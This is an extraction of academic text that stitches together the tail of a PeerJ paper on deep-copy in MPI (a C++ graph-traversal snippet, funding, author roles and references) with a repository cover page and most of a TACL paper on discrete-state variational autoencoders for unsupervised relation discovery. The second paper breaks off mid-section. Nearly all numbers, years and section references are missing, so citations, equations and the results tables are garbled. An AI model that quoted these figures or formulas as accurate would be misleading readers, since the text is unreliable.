http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // if node has not been visited if (pointermap.find(node) == pointermap.end()) { pointermap.insert(node); for (auto e : node->edges) stack.push(e); func(node); } } } inline void destructgraph(digraphnode<int> *&root) { visitgraph(root, [](digraphnode<int> *&node) -> void { mel::memdestruct(node); }); } additional information and declarations funding joss whittle is funded by an epsrc phd studentship. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: epsrc phd studentship. competing interests the authors declare that they have no competing interests. author contributions � joss whittle conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. � rita borgo conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � mark w. jones conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: source code available at: https://github.com/cs-swansea/mel. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cs-swansea/mel http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references beyer j, oehmke d, sandoval j. . transferring userdefined types in openacc. in: proceedings cray user group (cug’ ). lugano: cray user group. boost-community. . boost c++ libraries. version . . available at http://boost.org (accessed november ). bouteiller a. . fault-tolerant mpi. in: herault t, robert y, eds. fault-tolerance techniques for high-performance computing, chapter . heidelberg, new york, dordrecht, london: springer publishing company, incorporated, – . cogswell j. . adding an easy file save and file load mechanism to your c++ program. informit. available at http://www.boost.org/doc/libs/release/libs/serialization/ (accessed november ). fagg ge, bukovsky a, dongarra jj. . harness and fault tolerant mpi. parallel computing ( ): – doi . /s - ( ) - . fagg ge, dongarra jj. . building and using a fault-tolerant mpi implementation. international journal of high performance computing applications ( ): – doi . / . friedley a, hoefler t, bronevetsky g, lumsdaine a. . ownership passing: efficient distributed memory programming on multi-core systems. in: proceedings of the th acm sigplan symposium on principles and practice of parallel programming, shenzen, china. new york: acm, – . gna. . autoserial library. available at http://home.gna.org/autoserial/mpi.html. goujon ds, michel m, peeters j, devaney je. . automap and autolink tools for communicating complex and dynamic data-structures using mpi. in: panda dk, stunkel cb, eds. network-based parallel computing communication, architecture, and applications canpc ’ . berlin, heidelberg: springer, – . gropp w, lusk e. . fault tolerance in message passing interface programs. international journal of high performance computing applications ( ): – doi . / . grundmann t, ritt m, rosenstiel w. . tpo++: an object-oriented message-passing library in c++. in: proceedings of the international conference on parallel processing. piscataway: ieee, – . herault t, robert y. . fault-tolerance techniques for high-performance computing. first edition. switzerland: springer international publishing, – . hoefler t, snir m. . writing parallel libraries with mpi–common practice. in: proceedings of the th mpi users’ group meeting. vol. . berlin, heidelberg: springer, – . huang c, zheng g, kalé l, kumar s. . performance evaluation of adaptive mpi. in: proceedings of the eleventh acm sigplan symposium on principles and practice of parallel programming, ppopp ’ . new york: acm, – . kale lv, krishnan s. . charm++: a portable concurrent object oriented system based on c++. in: proceedings of the eighth annual conference on object-oriented programming systems, languages, and applications, oopsla ’ . new york: acm, – . laguna i, richards df, gamblin t, schulz m, de supinski br. . evaluating user-level fault tolerance for mpi applications. in: proceedings of the st european mpi users’ group meeting, eurompi/asia ’ . new york: acm, – . lee ea. . the problem with threads. computer ( ): – doi . /mc. . . whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://boost.org http://www.boost.org/doc/libs/release/libs/serialization/ http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://home.gna.org/autoserial/mpi.html http://dx.doi.org/ . / http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee l-q, lumsdaine a. . the generic message passing framework. in: parallel and distributed processing symposium, . proceedings. international. piscataway: ieee. mccandless bc, squyres jm, lumsdaine a. . object oriented mpi (oompi): a class library for the message passing interface. in: mpi developer’s conference, . piscataway: ieee, – . message passing interface forum. . mpi: a message-passing interface standard version . . technical report. stuttgart, de: high performance computing center stuttgart (hlrs). miller p. . productive parallel programming with charm++. in: proceedings of the symposium on high performance computing hpc ’ . san diego: society for computer simulation international, – . renault é. . extended mpicc to generate mpi derived datatypes from c datatypes automatically. in: cappello f, herault t, dongarra j, eds. recent advances in parallel virtual machine and message passing interface: th european pvm/mpi user’s group meeting. berlin, heidelberg: springer, – . tansey w, tilevich e. . efficient automated marshaling of c++ data structures for mpi applications. in: ieee international symposium on parallel and distributed processing, . ipdps . piscataway: ieee, – . vishnu a, dam hv, de jong w, balaji p, song s. . fault-tolerant communication runtime support for data-centric programming models. in: international conference on high performance computing, hipc , dona paula, goa, india, december – , . piscataway: ieee, – . whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementing generalized deep-copy in mpi introduction related work when to use deep copy mel–the mpi extension library mel implementation details benchmarks conclusions and future work appendices references edinburgh research explorer discrete-state variational autoencoders for joint discovery and factorization of relations citation for published version: marcheggiani, d & titov, i , 'discrete-state variational autoencoders for joint discovery and factorization of relations', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/discretestate-variational-autoencoders-for-joint-discovery-and-factorization-of-relations( b ff - - b -bf c- ee d ).html discrete-state variational autoencoders for joint discovery and factorization of relations diego marcheggiani illc university of amsterdam marcheggiani@uva.nl ivan titov illc university of amsterdam titov@uva.nl abstract we present a method for unsupervised open- domain relation discovery. in contrast to previous (mostly generative and agglomera- tive clustering) approaches, our model relies on rich contextual features and makes mini- mal independence assumptions. the model is composed of two parts: a feature-rich re- lation extractor, which predicts a semantic relation between two entities, and a factor- ization model, which reconstructs arguments (i.e., the entities) relying on the predicted re- lation. the two components are estimated jointly so as to minimize errors in recovering arguments. we study factorization models in- spired by previous work in relation factoriza- tion and selectional preference modeling. our models substantially outperform the genera- tive and agglomerative-clustering counterparts and achieve state-of-the-art performance. introduction the task of relation extraction (re) consists of de- tecting and classifying the semantic relations present in text. re has been shown to benefit a wide range of nlp tasks, such as information retrieval (liu et al., ), question answering (ravichandran and hovy, ) and textual entailment (szpektor et al., ). supervised methods for re have been success- ful when small restricted sets of relations are con- sidered. however, human annotation is expensive and time-consuming, and consequently these ap- proaches do not scale well to the open-domain set- ting where a large number of relations need to be detected in a heterogeneous text collection (e.g., the entire web). though weakly-supervised ap- proaches, such as distantly supervised methods and bootstrapping (mintz et al., ; agichtein and gravano, ), reduce the amount of necessary su- pervision, they still require examples for every rela- tion considered. these limitations led to the emergence of unsu- pervised approaches for re. these methods extract surface or syntactic patterns between two entities and either directly use these patterns as substitutes for semantic relations (banko et al., ; banko and etzioni, ) or cluster the patterns (sometimes in context-sensitive way) to form relations (lin and pantel, ; yao et al., ; nakashole et al., ; yao et al., ). the existing methods, given their generative (or agglomerative clustering) nature, rely on simpler features than their supervised coun- terparts and also make strong modeling assumptions (e.g., assuming that arguments are conditionally in- dependent of each other given the relation). these shortcomings are likely to harm their performance. in this work, we tackle the aforementioned chal- lenges and introduce a new model for unsupervised relation extraction. we also describe an efficient es- timation algorithm which lets us experiment with large unannotated collections. our model is com- posed of two components: • an encoding component: a feature-rich relation extractor which predicts a semantic relation be- tween two entities in a specific sentence given contextual features; • a reconstruction component: a factorization model which reconstructs arguments (i.e., the entities) relying on the predicted relation. the two components are estimated jointly so as to minimize errors in reconstructing arguments. while transactions of the association for computational linguistics, vol. , pp. – , . action editor: sebastian riedel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. learning to predict left-out arguments, the inference algorithm will search for latent relations that sim- plify the argument prediction task as much as possi- ble. roughly, such an objective will favour inducing relations that maximally constrain the set of admis- sible argument pairs. our hypothesis is that relations induced in this way will be interpretable by humans and useful in practical applications. why is this hy- pothesis plausible? primarily because humans typi- cally define relations as an abstraction capturing the essence of the underlying situation. and the under- lying situation (rather than surface linguistic details like syntactic functions) is precisely what imposes constraints on admissible argument pairs. this framework allows us to both exploit rich fea- tures (in the encoding component) and capture inter- dependencies between arguments in a flexible way (both in the reconstruction and encoding compo- nents). the use of a reconstruction-error objective, pre- viously considered primarily in the context of train- ing neural autoencoders (hinton, ; vincent et al., ), gives us an opportunity to borrow ideas from the well-established area of statistical rela- tional learning (getoor and taskar, ), and, more specifically, relation factorization. in this area, tensor and matrix factorization methods have been shown to be effective for inferring missing facts in knowledge bases (bordes et al., ; riedel et al., ; chang et al., ; bordes et al., ; sutskever et al., ). in our work, we also adopt a fairly standard rescal factorization (nickel et al., ) and use it within our reconstruction compo- nent. though there is a clear analogy between statisti- cal relational learning and our setting, there is also a very significant difference. in contrast to rela- tional learning, rather than factorizing existing re- lations (an existing ‘database’), our method simulta- neously discovers the relational schema (i.e., an in- ventory of relations) and a mapping from text to the relations (i.e., a relation extractor), and it does it in such a way as to maximize performance on recon- struction (i.e., inference) tasks. this analogy also highlights one important property of our framework: unlike generative models, we explicitly force our se- mantic representations to be useful for at least the most basic form of semantic inference (i.e., infer- ring an argument based on the relation and another argument). it is important to note that the model is completely agnostic about the real semantic relation between two arguments, as the relational schema is discovered during learning. we consider both a factorization method inspired by previous research in knowledge base modeling (as discussed above) and another, even simpler one, based on ideas from previous research on model- ing selectional preferences (e.g., resnik ( ); ó séaghdha ( ); van de cruys ( )), plus their combination. our models are applied to a version of the new york times corpus (sandhaus, ). in order to evaluate our approach, we follow yao et al. ( ) and align named entities in our collection to freebase (bollacker et al., ), a large collabo- rative knowledge base. in this way we can evaluate a subset of our induced relations against relations in freebase. note that freebase has not been used dur- ing learning, making this a fair evaluation scenario for an unsupervised relation induction method. we also qualitatively evaluate our model by both con- sidering several examples of induced relations (both appearing and not appearing in freebase) and vi- sualizing embeddings of named entities induced by our model. as expected, the choice of a factoriza- tion model affects the model performance. our best models substantially outperform the state-of-the-art generative rel-lda model of yao et al. ( ): . % f and . % f for our best model and rel- lda, respectively. the rest of the paper is structured as follows. in the following section, we formally describe the problem. in section , we motivate our approach. in section , we formally describe the method. in section we describe our experimental setting and discuss the results. we give more background on re, knowledge base completion and autoencoders in section . problem definition in the most standard form of re considered in this work, an extractor, given a sentence and a pair of named entities e and e , needs to predict the under- lying semantic relation r between these entities. for example, in the sentence roger ebert wrote a review of the fall feature representation of “ebert is the first ….” ( ) relation extractor ( = encoding) awarded(e : ebert, e : pulitzer prize) entity prediction ( = reconstruction) hidden log-linear feature-rich model factorization model x pulitzer prize figure : inducing relations with discrete-state autoencoders. we have two entities e = roger ebert and e = the fall, and the extractor should predict the semantic relation r = reviewed. the stan- dard approach to this task is to either rely on hu- man annotated data (i.e., supervised learning) or use data generated automatically by aligning knowledge bases (e.g., freebase) with text (called distantly- supervised methods). both classes of approaches as- sume a predefined inventory of relations and a man- ually constructed resource. in contrast, the focus of this paper is on open- domain unsupervised re (also known as relation discovery) where no fixed inventory of relations is provided to the learner. the methods induce rela- tions from the data itself. previous work on this task (banko et al., ), as well as on its general- ization, called unsupervised semantic parsing (poon and domingos, ; titov and klementiev, ), groups patterns between entity pairs (e.g., wrote a review, wrote a critique and reviewed) and uses these clusters as relations. other approaches (e.g., shinyama and sekine ( ); yao et al. ( ); yao et al. ( ); de lacalle and lapata ( )), in- cluding the one introduced in this paper, perform context-sensitive clustering, that is, they treat rela- tions as latent variables and induce them for each entity-pair occurrence individually. rather than re- lying solely on a pattern between entity pairs, the latter class of methods can use additional context to decide that napoleon reviewed the old guard and the above sentence about roger ebert should not be labeled with the same relation. in some of our examples we will use relation names, al- though our method, as virtually any other latent variable model, will not induce names but only indices. unsupervised relation discovery is an important task because existing knowledge bases (e.g., free- base, yago (suchanek et al., ), dbpedia (auer et al., )) do not have perfect coverage even for most standard domains (e.g., music or sports), and, arguably more importantly, because there are many domains not covered by these resources. though one option is to provide a list of relations with seed examples for each of them and then use bootstrap- ping (agichtein and gravano, ), it requires do- main knowledge and may thus be problematic. in these cases unsupervised relation discovery is the only non-labour-intensive way to construct a rela- tion extractor. moreover, unsupervised methods can also aid in building new knowledge bases by pro- viding an initial set of relations which can then be refined. as is common, in this work we limit ourselves to only considering binary relations between entities occurring in the same sentence. we focus only on extracting semantic relations, assuming that named entities have already been recognized by an exter- nal method (finkel et al., ). as in previous work (yao et al., ), we are not trying to detect if there is a relation between two entities or not; our aim is to detect a relation between each pair of enti- ties appearing in a sentence. in principle, heuristics (i.e., based on the syntactic dependency paths con- necting arguments) can be used to get rid of unlikely pairs. our approach we approach the problem by introducing a latent variable model which defines the interactions be- tween a latent relation r and the observables: the entity pair (e ,e ) and other features of the sentence x. the idea which underlies much of latent vari- able modeling is that a good latent representation is the one that helps us to reconstruct the input (i.e., x, including (e ,e )). in practice, we are not inter- ested in predicting x, as x is observable, but rather in inducing an appropriate latent representation (i.e., r). thus, it is crucial to design the model in such a way that a good r (the one predictive of x) indeed encodes relations rather than some other form of ab- straction. in our approach, we encode this reconstruction idea very explicitly. as a motivating example, con- sider the following sentence: ebert is the first journalist to win the pulitzer prize. as shown in figure , let us assume that we hide one argument, chosen at random: for example, e = pulitzer prize. now the purpose of the re- construction component is to reconstruct (i.e., infer) this argument relying on another argument (e = ebert), the latent relations r and nothing else. at learning time, our inference algorithm will search through the space of potential relation clusterings to find the one that makes these reconstruction tasks as simple as possible. for example, if the algorithm clusters expressions is the first journalist to win to- gether with was awarded, the prediction is likely to be successful, assuming that the passage ebert was awarded the pulitzer prize has been observed else- where in the training data. on the contrary, if the algorithm clustered is the first journalist to win with presented, we are likely to make a wrong inference (i.e., predict golden thumb award). given that we optimize the reconstruction objective, the former clustering is much more likely than the latter. re- construction can be seen as a knowledge base fac- torization approach similar to the ones of bordes et al. ( ). notice that the model’s final goal is to learn a good relation clustering, and that the recon- struction objective is used as a means to reach this goal. for reasons which will be clear in a moment, we will refer to the model performing the prediction of entities relying on other entities and relations as a decoder (a.k.a. the reconstruction component). despite our description of the model as pattern- clustering, it is important to stress that we are in- ducing clusters in a context-sensitive way. in other words, we are learning an encoder: a feature-rich classifier, which predicts a relation for a specific sen- tence and an entity pair in this sentence. clearly, this is a better approach because some of the patterns be- tween entities are ambiguous and require extra fea- tures to disambiguate them (recall the example from the previous section), whereas other patterns may not be frequent enough to induce reliable clustering (e.g., is the first journalist to win). the encoding and reconstruction components are learned jointly so as to minimize the prediction error. in this way, the encoder is specialized to the defined reconstruction problem. reconstruction error minimization in order to implement the desiderata sketched in the previous section, we take inspiration from a framework popular in the neural network commu- nity, namely autoencoders (hinton, ). autoen- coders are composed of two components: an en- coder which predicts a latent representation y from an input x, and a decoder which relies on the la- tent representation y to recover the input (x̃). in the learning phase, the parameters of both the encoding and reconstruction part are chosen so as to minimize a reconstruction error (e.g., the euclidean distance ||x− x̃|| ). although popular within the neural network com- munity (where y is defined as a real-valued vec- tor), autoencoders have recently been applied to the discrete-state setting (where y is defined as a cat- egorical random variable, a tuple of variables or a graph). for example, such models have been used in the context of dependency parsing (daumé iii, ), or in the context of pos tagging and word alignment (ammar et al., ; lin et al., a). the most related previous work (titov and khod- dam, ) considers induction of semantic roles of verbal arguments (e.g., an agent, a performer of an action vs. a patient, an affected entity), though no grouping of predicates into relations was consid- ered. we refer to such models as discrete-state au- toencoders. we use different model families for the decod- ing and reconstruction components. the encoding part is a log-linear feature-rich model, while the re- construction part is a tensor (or matrix) factorization model which seeks to reconstruct entities, relying on the outcome of the encoding component. . encoding component the encoding component, that is, the actual relation extractor that will be used to process new sentences, is a feature-rich classifier that, given a set of fea- tures extracted from the sentence, predicts the cor- responding semantic relation r ∈ r. we use a log- linear model (‘softmax regression’) q(r|x,w) = exp(w t g(r,x)))∑ r′∈r exp(w t g(r′,x)) , ( ) where g(r,x) is a high-dimensional feature repre- sentation and w is the corresponding vector of pa- rameters. in principle, the encoding model can be any model as long as the relation posteriors q(r|x,w) and their gradients can be efficiently com- puted or approximated. we discuss the features we use in the experimental section (section ). . reconstruction component in the reconstruction component (i.e., decoder), we seek to predict an entity ei ∈ e in a specific position i ∈ { , } given the relation r and an- other entity e−i, where e−i denotes the complement {e ,e }\{ei}. note that this model does not have access to any features of the sentence; this is crucial since in this way we ensure that all the essential in- formation is encoded by the relation variable. this bottleneck forces the learning algorithm to induce informative relations rather than cluster relation oc- currences in a random fashion or assign them all to the same relation. to simplify our notation, let us assume that we predict e ; the model for e will be analogous. we write the conditional probability models in the fol- lowing form p(e |e ,r,θ) = exp(ψ(e ,e ,r,θ))∑ e′∈e exp(ψ(e ′,e ,r,θ)) , ( ) where e is the set of all entities; ψ is a general scor- ing function which, as we will show, can be instan- tiated in several ways; θ represents its parameters. the actual set of parameters represented by θ will depend on the choice of scoring function. however, in all the cases we consider in this paper, the param- eters will include entity embeddings (ue ∈ rd for every e ∈ e). these embeddings will be learned within our model. in this work we explore three different factoriza- tions ψ for the decoding component: a tensor fac- torization model inspired by previous work on re- lation factorization, a simple selectional-preference model which scores each argument independently of the other, and a third model which is a combination of the first two. . . ψrs: rescal the first reconstruction model we consider is rescal, a model very successful in the relational modeling context (nickel et al., ; chang et al., ). it is a restricted version of the classic tucker tensor decomposition (tucker, ; kolda and bader, ) and is defined as ψrs(e ,e ,r,θ) = u t e crue , ( ) where ue ,ue ∈ rd are the entity embeddings cor- responding to the entities e and e . cr ∈ rd×d is a matrix associated with the latent semantic relation r; it evaluates (i.e., scores) the compatibility between the two arguments of the relation. . . ψsp : selectional preferences the second factorization ψsp scores how well each argument fits the selectional preferences of a given relation r ψsp (e ,e ,r,θ) = ∑ i= uteicir, ( ) where c r and c r ∈ rd encode selectional prefer- ences for the first and second argument of the rela- tion r, respectively. this factorization is also known as model e in riedel et al. ( ). in contrast to the previous model, it does not model the interaction be- tween arguments: it is easy to see that p(e |e ,r,θ) for this model (expression ( )) does not depend on e (i.e., on ue and c r). consequently, such a de- coder would be more similar to generative models of relations which typically assume that arguments are conditionally independent (yao et al., ). note however that our joint model can still capture ar- gument interdependencies in the encoding compo- nent. still, this approach does not fully implement the desiderata described in the previous section, so we generally expect this model to be weaker on reasonably-sized collections (this hypothesis will be confirmed in our experimental evaluation). . . ψhy : hybrid model the rescal model may be too expressive to be accurately estimated for infrequent relations, whereas the selectional preference model cannot, in turn, capture interdependencies between arguments. thus it seems natural to hope that their combination ψhy will be more accurate overall: ψhy (e ,e ,r,θ) = u t e crue + ∑ i= uteicir. ( ) this model is very similar to the tensor factorization approach proposed in socher et al. ( ). . learning we first provide an intuition behind the objective we optimize. we derive it more formally in the sub- sequent section, where we show that it can be re- garded as a variational lower bound on pseudolike- lihood (section . . ). as the resulting objective is still computationally expensive to optimize (due to a summation over all potential entities), we introduce further approximations in section . . . the parameters of the encoding and decoding components (i.e., w and θ) are estimated jointly. our general idea is to optimize the quality of argu- ment prediction while averaging over relations ∑ i= ∑ r∈r q(r|x,w) log p(ei|e−i,r,θ). ( ) though this objective seems natural, it has one seri- ous drawback: the induced posteriors q(r|x,w) end up being extremely sharp which, in turn, makes the search algorithm more prone to getting stuck in local minima. as we will see in the experimental results, this version of the objective results in lower aver- age performance. this behaviour can be explained by drawing connections with variational inference. roughly speaking, direct optimization of the above objective behaves very much like using hard em for generative latent-variable models. intuitively, one solution is, instead of optimizing expression ( ), to consider an entropy-regularized version that favours more uniform posterior distributions q(r|x,w) ∑ i= ∑ r∈r q(r|x,w)log p(ei|e−i,r,θ)+h(q(·|x,w)), ( ) where the last term h denotes the entropy over q. the entropy term can be seen as posterior regu- larization (ganchev et al., ) which pushes the posterior q(r|x,w) to be more uniform. as we will see in a moment, this approach can be for- mally justified by drawing connections to variational inference (jaakkola and jordan, ) and, more specifically, to variational autoencoders (kingma and welling, ). . . variational inference this subsection presents a justification for the ob- jectives ( ) and ( ); however, a reader not interested in this explanation can safely skip it and proceed di- rectly to section . . . for the moment let us assume that we perform generative modeling, and we consider optimization of the following pseudo-likelihood (besag, ) objective ∑ i= log ∑ r p(ei|e−i,r,θ)pu(r), ( ) where pu(r) is the uniform distribution over rela- tions. note that currently the encoding model is not part of this objective. the pseudo-likelihood (by jensen’s inequality) can be lower-bounded by the following variational bound ∑ i= ∑ r∈r qi(r) log p(ei|e−i,r,θ)pu(r) + h(qi), ( ) where qi is an arbitrary distribution over relations. note that pu(r) can be dropped from the expression as it corresponds to a constant with respect to the choice of both the variational distributions qi and the (reconstruction) model parameters θ. in variational inference, the maximization of the original (pseudo-)likelihood objective ( ) is replaced with the maximization of expression ( ) both with respect to qi and θ. this is typically achieved with an em-like step-wise procedure: steps where qi is selected for a given θ are alternated with steps where the parameters θ are updated while keeping qi fixed. one idea, introduced by kingma and welling ( ) for the continuous case, is to replace the search for an optimal qi with a predictor (a classifier in our discrete case) trained within the same optimization procedure. our encoding model q(r|x,w) is ex- actly such a predictor. with these two modifications (dropping the nuisance term pu and replacing qi with q(r|x,w)), we obtain the objective ( ). . . approximation the objective ( ) cannot be efficiently optimized in its exact form as the partition function of ex- pression ( ) requires the summation over the en- tire set of possible entities e. in order to deal with this challenge we rely on the negative sampling ap- proach of mikolov et al. ( ). specifically we avoid the softmax in expression ( ) and substitute log p(e |e ,r,θ) in the objective ( ) with the follow- ing expression log σ(ψ(e ,e ,r,θ)) + ∑ e neg ∈s log σ(−ψ(eneg ,e ,r,θ)), where s is a random sample of n entities from the distribution of entities in the collection and σ is the sigmoid function. intuitively, this expression pushes up the scores of arguments seen in the text and pushes down the scores of ‘negative’ arguments. when there are multiple entities e which satisfy the relation r with e (for example, natasha obama and malia ann obama, in relation child of with barack obama) the scores for all such en- tities will be pushed up. assuming both daughters are mentioned with a similar frequency, they will get similar scores. generally, arguments more fre- quently mentioned in text will get higher scores. in the end, instead of directly optimizing expres- sion ( ), we use the following objective ∑ i= eq(·|x,w) [ log σ(ψ(ei,e−i,r,θ)) + ∑ e neg i ∈s log σ(−ψ(enegi ,e−i,r,θ)) ] + αh(q(·|x,w)), ( ) where eq(·|x,w) [ . . . ] denotes an expectation com- puted with respect to the encoder distribution q(r|x,w). note the non-negative parameter α: after substituting the softmax with the negative sampling term, the entropy parameter and the expectation are not on the same scale anymore. though we could try estimating the scaling parameter α, we chose to tune it on the validation set. the gradients of the above objective can be cal- culated using backpropagation. with the proposed approximation, the computation of the gradients is quite efficient since the reconstruction model has a fairly simple form (e.g., bilinear) and learning the encoder is no more expensive than learning a su- pervised classifier. we used adagrad (duchi et al., ) as an optimization algorithm. experiments in this section we evaluate how effective our model is in discovering relations between pairs of entities in a sentence. we consider the unsupervised setting, so we use clustering measures for evaluation. since we want to directly compare to rel- lda (yao et al., ), we use the transductive set-up: we train our model on the entire training set (with labels removed) and we evaluate the es- timated model on a subset of the training set. given that we train the relation classifier (i.e., the encod- ing model), unlike some of the previous approaches, there is nothing in our approach which prevents us from applying it in an inductive scenario (i.e., to un- seen data). towards the end of this section we also provide qualitative evaluation of the induced relations and entity embeddings. . data and evaluation measures we tested our model on the new york times cor- pus (sandhaus, ) using articles from to . we use the same filtering and preprocessing steps (pos tagging, ner, and syntactic parsing) as the ones described in yao et al. ( ). in that way we obtained about million entity pairs (i.e., poten- tial relation realizations). in order to evaluate our models, we aligned each entity pair with freebase, and, as in yao et al. ( ), we discarded unaligned ones from the eval- uation. we consider freebase relations as gold- standard clusterings and evaluated induced relations against them. note that we use the micro-reading scenario (nakashole and mitchell, ), that is, we predict a relation on the basis of a single occurrence of an entity pair rather than aggregating informa- tion across all the occurrences of the pair in the cor- pus. though it is likely to harm our performance when evaluating against freebase, this is a deliberate choice as we believe extracting relations about less frequent entities (where there is little redundancy in a collection) and modelling content of specific documents is a more challenging and important re- search direction. moreover, feature-rich models are likely to be especially beneficial in these scenarios, as for micro-reading the information extraction sys- tems cannot fall back to easier non-ambiguous con- texts. we use the b metric (bagga and baldwin, ) as the scoring function. b is a standard measure for evaluating precision and recall of clustering tasks (yao et al., ). as the final evaluation score we use f , the harmonic mean of precision and recall. . features the crucial characteristic of the learning method we propose is the ability to handle a rich (and overlap- ping) set of features. with this in mind we adopted the following set of features: . bag of words between e and e ; . the surface form of e and e ; . the lemma of the ‘trigger’ (i.e., for the passage microsoft is based in redmond, the trigger is based and its lemma is base); . the part-of-speech sequence between e and e ; . the entity type of e and e (as a pair); . the entity type of e ; . the entity type of e ; . words on the syntactic dependency path be- tween e and e , i.e., the lexicalized path be- tween the entities stripped of dependency labels and their direction. we define triggers as in yao et al. ( ), namely “all the words on the dependency path except stop words”. for example, from the sentence stephen moore, director of fiscal policy studies at the conservative cato institute, we would extract the following features: . bow:director, bow:of, bow:fiscal, bow:policy, bow:studies, bow:at, bow:the; . e :stephen moore, e :cato institute; . trigger:director; . pos:nn in jj nn nns in dt jj; . pairtype:person organization; . e type:person; . e type:organization; . path:director at. . parameters and baselines all model parameters (w,θ) were initialized ran- domly. the embedding dimensionality d was set to . we induced relations, the same as used for rel-lda in yao et al. ( ). we also set the mini batch size to , the initial learning rate of adagrad to . and the number of negative sam- ples n to . the results reported in table are average results of three runs obtained after itera- tions over the entire training set. for each model we tuned the weight for the l regularization penalty and chose . as it worked well across all the mod- els. we tuned the α coefficient (i.e., the weight for the entropy term) for each model: we chose . for rescal, . for the selectional preferences, and . for the hybrid model. all model selection was performed on a validation set: we selected a random % of the entire dataset, and considered all entity pairs aligned to freebase. the final evaluation was done on the remaining %. in order to compare our models with the state of the art in unsupervised re, we used as a base- line the rel-lda model introduced in yao et al. ( ). rel-lda is an application of the lda topic model (blei et al., ) to the relation discovery task. in rel-lda topics correspond to latent rela- tions, and, instead of relying on words as lda does, rescal selectional pref. hybrid rel-lda (our feats) rel-lda (yao et al., ) feats hac (dirt) . ± . . ± . . ± . . ± . . ± . . table : average f results (%), and the standard deviation, across runs of different models on the test set. rel-lda uses predefined features, including argu- ment words. in a similar fashion to our selectional- preference decoder, it assumes that arguments are conditionally independent given the relation. as an- other baseline, following yao et al. ( ), we used hierarchical agglomerative clustering (hac). this baseline is very similar to the standard unsupervised relation extraction method dirt (lin and pantel, ). the hac cut-off parameter was set to . based on the development set performance. we used the same feature representation for all the models, including the baselines. we also report results of rel-lda using the features from yao et al. ( ). . results and discussion the results we report in table are mean and stan- dard deviations across runs with different random initialization of the parameters (except for the deter- ministic hac approach). first, we can observe that using richer features is beneficial for the generative baseline. it leads to a substantial improvement in f (from . % to . % f ). the hac baseline is outperformed by rel-lda ( . % vs. . % f ). however, all our proposed models substantially out- perform all baselines: the best result is . % f . the selectional preference model on average per- forms better than the best baseline ( . % vs. . % f ). as we predicted in section , compared with the rescal model, the selectional preference model has slightly lower performance ( . % vs. . % f ). this is not surprising as the argument in- dependence assumption is very strong, and the gen- eral motivation we provided in section does not really apply to the selectional preference model. combining rescal and selection preference models, as we expected, gives some advantage in terms of performance. the hybrid model is the best performing model with . % f , and it is, on aver- age, . % more accurate than rel-lda. the introduction of entropy in expression ( ) does yao et al. ( ) is a follow-up work for yao et al. ( ). . . alpha f figure : results of the hybrid model on the validation set, with different α. not only add an extra justification to the objective we optimize, but also helps to improve the mod- els’ performance. in fact, as shown in figure for the hybrid model, the difference between having or not the entropy term makes a big difference, going from . % without regularization to . % f with regularization. note that the method is quite sta- ble within the range α ∈ [ . , ], and more fine- grained tuning of α seems only mildly beneficial. however the performance with small values of α ( . ) is more problematic: hybrid both does not outperform rel-lda and has a large variance across runs. somewhat counter-intuitively, with α = (no entropy regularization) the variance is almost negli- gible. however, given the low performance in this regime, it probably just means that we get consis- tently stuck in equally bad local minima. though it may seem that the need to tune the entropy term weight is an unfortunate side effect of using the non-probabilistic objective from sec- tion . . , the reality is more subtle. in fact, even for fully probabilistic variational autoencoders with real-valued states y, using the weight of , as prescribed by their variational interpretation (see section . . ), does not lead to stable perfor- mance (bowman et al., ). instead, annealing over α seems necessary. though annealing is likely relation relation relation president review professor director review restaurant dean chairman review production graduate executive review book director spokesman review performance specialist manager column review attend analyst review concert expert owner review revival professor study professor review rise chairman table : relation clusters ordered from left to right by their frequency. to benefit our method as well, we leave it for future work. since the proposed model is unsupervised, it is in- teresting to inspect the relations induced by our best model. in order to do so, we select the most likely relation according to our relation extractor (i.e., en- coding model) for every context in the validation set and then, for every relation, we count occurrences of every trigger. the most-frequent trigger for three induced relations are presented in table . relation encodes the relation reviewed (not present in freebase), as in anthony tommasini reviews metropolitan opera’s production of cosi fan tutte. clusters and are examples of more coarse rela- tions. relation represents a broader academic relation, as in the passage dr. susan merritt, dean of the school of computer science and information systems. or as in the passage george myers graduated from yale university. cluster instead groups together expressions such as leads or president (of), so it can vaguely be de- scribed as a leadership relation, but it also con- tains the relation triggered by the word professor (in). in fact, this is the most frequent relation in- duced by our model. we can check further by look- ing at the learned embeddings of named entities vi- sualized with the t-sne algorithm (van der maaten and hinton, ). in figure , we can see that en- tities representing universities and non-academic or- semi-sup rescal . semi-sup selectional pref. . semi-sup hybrid . unsup hybrid . table : average f results (%) for semi-supervised and unsupervised models, across runs of different models tested on te. ganizations end up being very close in the embed- ding space. this artefact is likely to be related to the coarseness of relations and , though it does not provide a good explanation for why this has hap- pened, since the entity embeddings are also induced within our model. however, overlaps in embeddings do not seem to be a general problem: the t-sne visualization shows that most entities are well clustered into fine-grained types, for example, football teams, nations, and mu- sic critics. . decoder influence in order to examine the 